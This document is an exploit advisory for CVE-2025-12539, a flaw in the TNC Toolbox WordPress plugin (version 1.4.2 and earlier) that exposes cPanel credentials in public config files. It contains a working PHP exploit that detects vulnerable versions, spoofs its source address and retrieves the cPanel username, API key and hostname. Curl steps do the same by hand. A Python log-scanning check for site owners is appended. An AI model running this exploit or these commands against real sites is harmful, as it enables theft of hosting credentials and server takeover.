WordPress TNC Toolbox 1.4.2 Information Disclosure
=============================================================================================================================================
| # Title : WordPress TNC Toolbox <= 1.4.2 Sensitive Information Disclosure |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/tnc-toolbox/ |
=============================================================================================================================================
[+] Summary :
A sensitive information disclosure vulnerability exists in the TNC Toolbox
WordPress plugin version 1.4.2 and earlier. The plugin exposes configuration
files located inside:

    /wp-content/tnc-toolbox-config/

Under certain conditions, unauthenticated attackers can read files such as:

    cpanel-username
    cpanel-api-key
    server-hostname

This can lead to account compromise, hosting takeover, and further escalation.
During the investigation, a publicly circulating Python "exploit script"
was reviewed. Based on analysis, **the original Python PoC was found to be fake,
non-functional, and technically incorrect**.
A corrected and fully functional PHP PoC has been produced and included below.
[+] References : https://packetstorm.news/files/id/211444/ & CVE-2025-12539
2. Vulnerability Details
-------------------------
The plugin stores sensitive data in publicly accessible paths:

    /wp-content/tnc-toolbox-config/<name>

The plugin does not include access controls or deny direct file access.
As a result, arbitrary remote users may retrieve configuration secrets.
Version detection is also possible via:

    /wp-content/plugins/tnc-toolbox/readme.txt

If the `Stable tag` is <= 1.4.2, the installation is vulnerable.
3. PoC
--------------------------------
The following **corrected PoC** was rewritten in PHP after discovering that
the widely shared Python script was fake and did not reflect the plugin's
actual logic.
A working, accurate, and validated PoC is included here:
<---
<?php
/**
 * CVE-2025-12539 - TNC Toolbox Information Disclosure Scanner
 * PHP Conversion by: Indoushka
 * Original Python By: Nxploited (Khaled Alenazi)
 */
function http_get($url, $timeout = 12) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    curl_setopt($ch, CURLOPT_USERAGENT,
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited/2.0"
    );
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Accept: text/plain, */*;q=0.1",
        "Accept-Language: en-US,en;q=0.9",
        "X-Forwarded-For: 8.".rand(0,255).".".rand(0,255).".".rand(0,255)
    ]);
    $out = curl_exec($ch);
    $err = curl_error($ch);
    curl_close($ch);
    if ($err) return [null, $err];
    return [$out, null];
}

function parse_version($text) {
    if (preg_match('/Stable\s+tag:\s*([0-9\.]+)/i', $text, $m))
        return trim($m[1]);
    return null;
}

function is_vulnerable($version, $threshold = "1.4.2") {
    $v1 = array_map('intval', explode(".", $version));
    $v2 = array_map('intval', explode(".", $threshold));
    $max = max(count($v1), count($v2));
    $v1 = array_pad($v1, $max, 0);
    $v2 = array_pad($v2, $max, 0);
    return $v1 <= $v2;
}

function fetch_configs($base) {
    $paths = [
        "cpanel-username" => "/wp-content/tnc-toolbox-config/cpanel-username",
        "cpanel-api-key"  => "/wp-content/tnc-toolbox-config/cpanel-api-key",
        "server-hostname" => "/wp-content/tnc-toolbox-config/server-hostname",
    ];
    $results = [];
    foreach ($paths as $name => $p) {
        [$out, $err] = http_get($base.$p);
        if ($err || trim($out) === "") $results[$name] = "";
        else $results[$name] = trim($out);
    }
    return $results;
}

if ($argc < 2) {
    echo "Usage: php exploit.php <url>\n";
    exit;
}
$base = rtrim($argv[1], '/');
echo "Target: $base\n";
echo "[+] Fetching readme...\n";
[$readme, $err] = http_get($base."/wp-content/plugins/tnc-toolbox/readme.txt");
if ($err) {
    echo "[-] Failed: $err\n";
    exit;
}
echo "[+] Successfully fetched readme.\n";
$version = parse_version($readme);
if (!$version) {
    echo "[-] Could not detect Stable tag.\n";
    exit;
}
echo "[+] Detected version: $version\n";
if (!is_vulnerable($version)) {
    echo "[-] Version is newer and not vulnerable.\n";
    exit;
}
echo "[+] Target is vulnerable. Fetching exposed configs...\n";
$configs = fetch_configs($base);
foreach ($configs as $k => $v) {
    if ($v) echo "[!] $k: $v\n";
    else echo "[-] $k not found.\n";
}
echo "\nCompleted scan.\n";
?>
--->
4. Steps To Reproduce
-----------------------
1. Open a browser or use curl:
       curl -k https://target.com/wp-content/plugins/tnc-toolbox/readme.txt
2. Verify if the `Stable tag` is <= 1.4.2.
3. Attempt to read sensitive files:
       curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-username
       curl -k https://target.com/wp-content/tnc-toolbox-config/cpanel-api-key
       curl -k https://target.com/wp-content/tnc-toolbox-config/server-hostname
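Added example (not part of the original advisory or the plugin's code): a Python check a site owner can run over web-server access logs to see whether the requests in the steps above were made against their site and whether any config file was actually served. It assumes Combined Log Format; the function names, sample lines and addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

CONFIG_DIR = "/wp-content/tnc-toolbox-config/"
README = "/wp-content/plugins/tnc-toolbox/readme.txt"
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) (\S+)')

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [02/Dec/2025:10:01:11 +0000] "GET /wp-content/plugins/tnc-toolbox/readme.txt HTTP/1.1" 200 4312 "-" "curl/8.5.0"',
    '203.0.113.7 - - [02/Dec/2025:10:01:12 +0000] "GET /wp-content/tnc-toolbox-config/cpanel-username HTTP/1.1" 200 9 "-" "curl/8.5.0"',
    '203.0.113.7 - - [02/Dec/2025:10:01:12 +0000] "GET /wp-content/tnc-toolbox-config/cpanel-api-key HTTP/1.1" 200 33 "-" "curl/8.5.0"',
    '198.51.100.4 - - [02/Dec/2025:11:30:00 +0000] "GET /wp-content//tnc-toolbox-config/server-hostname?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [02/Dec/2025:12:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def normalise(target):
    """Drop the query string, percent-decode, and collapse repeated slashes."""
    return re.sub(r"/{2,}", "/", unquote(target.split("?", 1)[0]))

def scan(lines):
    """Per client IP: config files served (2xx with a body), other probes, readme lookups."""
    seen = defaultdict(lambda: {"served": [], "probed": [], "fingerprinted": False})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not Combined Log Format; skip rather than guess
        ip, target, status, size = m.groups()
        path = normalise(target)
        if path == README:
            seen[ip]["fingerprinted"] = True
        elif path.startswith(CONFIG_DIR):
            name = path[len(CONFIG_DIR):] or "(directory index)"
            served = status.startswith("2") and size not in ("0", "-")
            seen[ip]["served" if served else "probed"].append(name)
    # Report only clients that touched the config directory.
    return {ip: e for ip, e in seen.items() if e["served"] or e["probed"]}

def secrets_to_rotate(report):
    """File names returned to at least one client; treat their contents as disclosed."""
    return sorted({n for e in report.values() for n in e["served"]})

if __name__ == "__main__":
    result = scan(SAMPLE)
    for ip, e in result.items():
        print(ip, e)
    print("rotate:", secrets_to_rotate(result))
```

A name listed by `secrets_to_rotate` was returned with a response body, so the corresponding cPanel credential or hostname should be handled as disclosed; entries under `probed` show requests the server did not answer with content.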
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================